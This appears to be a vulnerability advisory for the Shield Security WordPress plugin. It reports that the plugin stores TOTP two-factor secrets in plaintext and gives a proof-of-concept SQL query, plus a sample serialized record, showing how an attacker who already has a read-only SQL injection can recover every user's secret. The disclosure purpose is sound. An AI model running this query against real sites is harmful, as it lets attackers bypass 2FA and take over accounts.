Compromise of 2FA secrets through read-only SQLi – (Shield Security <= 16.1.6)

Affected pluginShield Security
Active installs60,000+
Vulnerable version<= 16.1.6
Audited version16.1..1
Fully patched version
Recommended remediationRemoval of the plugin

Description


The plugin stores users’ TOTP secrets as plaintext in the database.
An attacker that can obtain one of the seemingly never-ending read-only SQL-Injections will be able to bypass all 2FA checks for all users indefinitely.

Proof of concept


The following code is used to retrieve TOTP secrets from the “wp_usermeta” table:

protected function getSecret() {
	$secret = $this->getCon()->getUserMeta( $this->getUser() )->{static::SLUG.'_secret'};
	return empty( $secret ) ? static::DEFAULT_SECRET : $secret;
}

* “static::SLUG” is equal to “(string) ga”.

An attacker can obtain all TOTP secrets through his read-only SQLi by running the following query.

SELECT user_id, meta_value FROM wp_usermeta WHERE meta_key = 'icwp-wpsf-meta'

Each record is a serialized PHP array that contains all user meta for one user.

After deserializing the records using PHP’s unserialize function, each record has a “ga_secret” key which is the user’s TOTP secret.

a:8:{s:6:"prefix";s:9:"icwp-wpsf";s:7:"user_id";i:1;s:9:"pass_hash";s:4:"266b";s:5:"tours";a:2:{s:12:"dashboard_v1";i:1662922763;s:13:"navigation_v1";i:1662923128;}s:9:"ga_secret";s:16:"TJD7I4OXNQNPU3RD";s:12:"ga_validated";b:1;s:13:"login_intents";a:1:{s:10:"160ede8d07";a:2:{s:5:"start";i:1662982530;s:8:"attempts";i:0;}}s:9:"flash_msg";N;}

==> ga_secret: TJD7I4OXNQNPU3RD

Timeline


Vendor contactedSeptember 12, 2022
First ResponseSeptember 12, 2022
Fully patched at
Publicly disclosedApril 24, 2023

Miscellaneous


Leave a Reply

Your email address will not be published. Required fields are marked *